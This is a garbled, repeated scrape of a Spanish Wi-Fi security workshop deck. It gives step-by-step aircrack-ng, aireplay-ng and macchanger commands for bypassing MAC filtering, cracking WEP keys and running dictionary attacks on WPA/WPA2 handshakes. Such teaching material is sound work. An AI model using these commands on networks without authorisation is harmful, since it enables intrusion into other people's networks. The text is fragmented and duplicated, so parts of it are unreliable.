bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 59: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 60: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 61: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 62: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

